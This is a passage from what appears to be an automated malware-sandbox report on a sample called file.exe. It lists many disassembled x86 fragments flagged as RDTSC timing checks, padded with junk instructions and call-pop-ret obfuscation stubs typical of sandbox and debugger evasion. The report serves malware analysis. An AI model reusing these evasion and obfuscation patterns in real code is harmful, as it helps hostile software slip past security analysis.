              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988142 second address: 98818C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3783F6B4h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F3BACE24FD8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 pushad 0x0000002a mov dword ptr [ebp+1247B961h], esi 0x00000030 popad 0x00000031 push E127E9A8h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jns 00007F3BACE24FD6h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98862B second address: 988645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988CC1 second address: 988CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988CCB second address: 988CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988D59 second address: 988D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988D62 second address: 988D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988D66 second address: 988D7E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3BACE24FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c clc 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F3BACE24FDCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988D7E second address: 988D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9892EE second address: 9892F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9892F3 second address: 9892F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9892F9 second address: 9892FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9898DE second address: 9898E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9898E3 second address: 9898E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DE8C second address: 98DEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007F3BAC7E5E11h 0x0000000c nop 0x0000000d mov si, bx 0x00000010 push 00000000h 0x00000012 cmc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F3BAC7E5E08h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jns 00007F3BAC7E5E0Ch 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98DEDA second address: 98DEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E94C second address: 98E95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F3BAC7E5E0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E95B second address: 98E9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F3BACE24FDFh 0x0000000c pushad 0x0000000d jl 00007F3BACE24FD6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 jmp 00007F3BACE24FDDh 0x0000001d push 00000000h 0x0000001f or dword ptr [ebp+1244D93Ch], eax 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 mov dword ptr [ebp+122D2294h], edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F3BACE24FE0h 0x00000038 jmp 00007F3BACE24FDDh 0x0000003d popad 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993EFC second address: 993F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993F00 second address: 993F1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995D8C second address: 995D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995E47 second address: 995E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995E4B second address: 995E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F3BAC7E5E06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998AED second address: 998AF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998AF3 second address: 998AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998C8D second address: 998C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998C92 second address: 998C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99AC15 second address: 99AC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F3BACE24FDCh 0x00000010 jg 00007F3BACE24FD6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998DBB second address: 998DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99AC2B second address: 99ACAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a ja 00007F3BACE24FDCh 0x00000010 push 00000000h 0x00000012 xor edi, dword ptr [ebp+122D2109h] 0x00000018 or dword ptr [ebp+122D195Bh], edx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F3BACE24FD8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D199Ch] 0x00000040 mov dword ptr [ebp+122D248Dh], ebx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 jc 00007F3BACE24FEFh 0x0000004e jmp 00007F3BACE24FE9h 0x00000053 js 00007F3BACE24FDCh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ACAB second address: 99ACCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3BAC7E5E18h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99ACCD second address: 99ACE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99BD2D second address: 99BD65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F3BAC7E5E11h 0x0000000f jmp 00007F3BAC7E5E14h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F3BAC7E5E06h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99DDEE second address: 99DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F3BACE24FD8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add ebx, dword ptr [ebp+122D2920h] 0x00000029 mov dword ptr [ebp+122D289Ch], eax 0x0000002f push 00000000h 0x00000031 pushad 0x00000032 ja 00007F3BACE24FDCh 0x00000038 popad 0x00000039 call 00007F3BACE24FE3h 0x0000003e pushad 0x0000003f mov eax, dword ptr [ebp+122D5691h] 0x00000045 mov bh, ah 0x00000047 popad 0x00000048 pop ebx 0x00000049 push 00000000h 0x0000004b adc ebx, 688EBE11h 0x00000051 xchg eax, esi 0x00000052 jmp 00007F3BACE24FDDh 0x00000057 push eax 0x00000058 jbe 00007F3BACE24FE4h 0x0000005e pushad 0x0000005f jc 00007F3BACE24FD6h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D0C7 second address: 99D0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E12h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D0DE second address: 99D0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EEB6 second address: 99EEC0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1F9E second address: 9A1FA8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3BACE24FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1FA8 second address: 9A1FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F3BAC7E5E08h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1FB9 second address: 9A205E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3BACE24FDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F3BACE24FD8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F3BACE24FD8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007F3BACE24FD8h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d jmp 00007F3BACE24FE9h 0x00000062 xchg eax, esi 0x00000063 push eax 0x00000064 push edx 0x00000065 jl 00007F3BACE24FDCh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A205E second address: 9A2062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2062 second address: 9A2082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BACE24FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F3BACE24FDCh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E036 second address: 99E03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F0D9 second address: 99F0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00DF second address: 9A00EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A10D2 second address: 9A1176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F3BACE24FE4h 0x0000000d nop 0x0000000e movsx edi, ax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 xor edi, dword ptr [ebp+122D2CBDh] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F3BACE24FD8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3387h], ebx 0x00000045 mov eax, dword ptr [ebp+122D0A49h] 0x0000004b jmp 00007F3BACE24FDEh 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ebx 0x00000055 call 00007F3BACE24FD8h 0x0000005a pop ebx 0x0000005b mov dword ptr [esp+04h], ebx 0x0000005f add dword ptr [esp+04h], 0000001Ch 0x00000067 inc ebx 0x00000068 push ebx 0x00000069 ret 0x0000006a pop ebx 0x0000006b ret 0x0000006c or ebx, dword ptr [ebp+122D2B3Dh] 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00EC second address: 9A00F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F40 second address: 9A3F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1176 second address: 9A117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A00F1 second address: 9A00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F44 second address: 9A3F51 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F51 second address: 9A3F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3F55 second address: 9A3FE9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F3BAC7E5E1Eh 0x00000010 jmp 00007F3BAC7E5E18h 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F3BAC7E5E08h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F3BAC7E5E08h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f movsx edi, dx 0x00000052 sbb edi, 328C3100h 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007F3BAC7E5E15h 0x0000005f push ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0198 second address: 9A01A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F19 second address: 9A4F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4F1F second address: 9A4F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A41EC second address: 9A4208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3BAC7E5E18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4208 second address: 9A421B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007F3BACE24FD6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5046 second address: 9A504B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5129 second address: 9A512D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC157 second address: 9AC15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC15C second address: 9AC161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946635 second address: 946653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BAC7E5E0Dh 0x00000009 jno 00007F3BAC7E5E06h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946653 second address: 946657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB8E6 second address: 9AB8EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB8EB second address: 9AB8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AB8F1 second address: 9AB916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3BAC7E5E18h 0x0000000c jne 00007F3BAC7E5E06h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABA71 second address: 9ABA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBB9 second address: 9ABBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3BAC7E5E06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBC3 second address: 9ABBCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F3BACE24FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBCF second address: 9ABBEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3BAC7E5E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBEB second address: 9ABBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABBEF second address: 9ABC27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F3BAC7E5E06h 0x00000011 jbe 00007F3BAC7E5E06h 0x00000017 jc 00007F3BAC7E5E06h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push esi 0x00000022 jl 00007F3BAC7E5E06h 0x00000028 jl 00007F3BAC7E5E06h 0x0000002e pop esi 0x0000002f pushad 0x00000030 jno 00007F3BAC7E5E06h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF4DB second address: 9AF4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2905 second address: 9B294D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BAC7E5E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F3BAC7E5E0Ch 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F3BAC7E5E11h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c push ebx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop ebx 0x00000020 pushad 0x00000021 jbe 00007F3BAC7E5E06h 0x00000027 jc 00007F3BAC7E5E06h 0x0000002d popad 0x0000002e popad 0x0000002f mov eax, dword ptr [eax] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3DD4 second address: 9B3E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3BACE24FDBh 0x00000009 popad 0x0000000a jc 00007F3BACE24FF5h 0x00000010 jbe 00007F3BACE24FD6h 0x00000016 jmp 00007F3BACE24FE9h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3E09 second address: 9B3E15 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3BAC7E5E0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B2A second address: 944B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9678 second address: 9B967F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B967F second address: 9B9685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9685 second address: 9B968B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
